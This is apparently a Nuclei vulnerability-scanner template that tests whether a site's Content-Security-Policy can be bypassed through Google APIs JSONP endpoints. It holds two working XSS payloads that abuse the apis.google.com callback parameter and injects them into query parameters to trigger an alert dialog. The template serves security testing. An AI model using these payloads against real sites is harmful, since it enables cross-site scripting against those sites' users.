id: google-apis-csp-bypass
info:
name: Content-Security-Policy Bypass - Google APIs
author: renniepak,DhiyaneshDK
severity: medium
reference:
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
metadata:
verified: true
tags: xss,csp-bypass,google-apis,vuln
flow: http(1) && headless(1)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: header
words:
- "Content-Security-Policy"
- "googleapis.com"
condition: and
internal: true
headless:
- steps:
- action: navigate
args:
url: "{{BaseURL}}"
- action: waitdialog
name: google_apis_csp_xss
args:
max-duration: 5s
payloads:
injection:
- '<iframe id=x src="/%GG"></iframe><script src="https://apis.google.com/complete/search?client=chrome&q=<script>alert(document.domain)</script>&callback=x.contentDocument.write"></script>'
- '<script src="https://apis.google.com/complete/search?client=chrome&q=x&callback=alert"></script>'
fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{url_encode(injection)}}"
matchers:
- type: dsl
dsl:
- "google_apis_csp_xss == true"
# digest: 4b0a0048304602210082d8aa633c3c349bbaadb1f105e31e500e03411bd1c7db906613c86cfba22dd6022100985b57514a41f5ba643e76268dbd758e8ee6c51ee2c1d6e4be42ad60e402a7e7:922c64590222798bb761d5b6d8e72950